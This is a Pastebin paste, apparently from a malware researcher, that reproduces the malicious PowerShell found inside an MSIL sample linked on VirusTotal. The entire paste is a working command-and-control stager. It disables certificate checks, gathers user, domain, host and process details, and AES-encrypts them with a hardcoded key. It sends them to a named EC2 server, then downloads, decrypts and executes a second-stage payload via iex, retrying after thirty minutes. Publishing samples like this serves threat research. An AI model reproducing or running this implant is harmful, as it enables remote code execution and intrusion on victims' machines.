dissectmalware

Malicious Powershell Embedded in MSIL file

Jul 27th, 2018
830
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # malicious powershell embedded in https://www.virustotal.com/#/file/c559fb75ccbe922c2b3f28c40f6525d575406d64febd87b68d0c4c0141d4aaa6/detection
  2.  
  3. [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
  4. $sc="https://ec2-13-127-208-134.ap-south-1.compute.amazonaws.com:443"
  5. $s="https://ec2-13-127-208-134.ap-south-1.compute.amazonaws.com:443/images/static/content/"
  6. function CAM ($key,$IV){
  7. $a = New-Object -TypeName "System.Security.Cryptography.RijndaelManaged"
  8. $a.Mode = [System.Security.Cryptography.CipherMode]::CBC
  9. $a.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
  10. $a.BlockSize = 128
  11. $a.KeySize = 256
  12. if ($IV)
  13. {
  14. if ($IV.getType().Name -eq "String")
  15. {$a.IV = [System.Convert]::FromBase64String($IV)}
  16. else
  17. {$a.IV = $IV}
  18. }
  19. if ($key)
  20. {
  21. if ($key.getType().Name -eq "String")
  22. {$a.Key = [System.Convert]::FromBase64String($key)}
  23. else
  24. {$a.Key = $key}
  25. }
  26. $a}
  27. function ENC ($key,$un){
  28. $b = [System.Text.Encoding]::UTF8.GetBytes($un)
  29. $a = CAM $key
  30. $e = $a.CreateEncryptor()
  31. $f = $e.TransformFinalBlock($b, 0, $b.Length)
  32. [byte[]] $p = $a.IV + $f
  33. [System.Convert]::ToBase64String($p)
  34. }
  35. function DEC ($key,$enc){
  36. $b = [System.Convert]::FromBase64String($enc)
  37. $IV = $b[0..15]
  38. $a = CAM $key $IV
  39. $d = $a.CreateDecryptor()
  40. $u = $d.TransformFinalBlock($b, 16, $b.Length - 16)
  41. [System.Text.Encoding]::UTF8.GetString($u)}
  42. function Get-Webclient ($Cookie) {
  43. $d = (Get-Date -Format "dd/MM/yyyy");
  44. $d = [datetime]::ParseExact($d,"dd/MM/yyyy",$null);
  45. $k = [datetime]::ParseExact("09/08/2018","dd/MM/yyyy",$null);
  46. if ($k -lt $d) {exit}
  47. $username = ""
  48. $password = ""
  49. $proxyurl = ""
  50. $wc = New-Object System.Net.WebClient;
  51.  
  52. $h=""
  53. if ($h -and (($psversiontable.CLRVersion.Major -gt 2))) {$wc.Headers.Add("Host",$h)}
  54. elseif($h){$script:s="https://$($h)images/static/content/";$script:sc="https://$($h)"}
  55. $wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko")
  56. $wc.Headers.Add("Referer","")
  57. if ($proxyurl) {
  58. $wp = New-Object System.Net.WebProxy($proxyurl,$true);
  59. if ($username -and $password) {
  60. $PSS = ConvertTo-SecureString $password -AsPlainText -Force;
  61. $getcreds = new-object system.management.automation.PSCredential $username,$PSS;
  62. $wp.Credentials = $getcreds;
  63. } else { $wc.UseDefaultCredentials = $true; }
  64. $wc.Proxy = $wp; } else {
  65. $wc.UseDefaultCredentials = $true;
  66. $wc.Proxy.Credentials = $wc.Credentials;
  67. } if ($cookie) { $wc.Headers.Add([System.Net.HttpRequestHeader]::Cookie, "SessionID=$Cookie") }
  68. $wc }
  69. function primer {
  70. if ($env:username -eq "$($env:computername)$"){$u="NT AUTHORITY\SYSTEM"}else{$u=$env:username}
  71. $o="$env:userdomain\$u;$u;$env:computername;$env:PROCESSOR_ARCHITECTURE;$pid;https://ec2-13-127-208-134.ap-south-1.compute.amazonaws.com"
  72. $pp=enc -key 0Kdjin+hG/Ym53Fa2i4C8y8PSh8ckR1zIl5CkHrPV00= -un $o
  73. $primer = (Get-Webclient -Cookie $pp).downloadstring($s)
  74. dec -key 0Kdjin+hG/Ym53Fa2i4C8y8PSh8ckR1zIl5CkHrPV00= -enc $primer}
  75. $primer = primer
  76. if ($primer) {$primer| iex} else {
  77. start-sleep 1800
  78. primer | iex }
Add Comment
Please, Sign In to add comment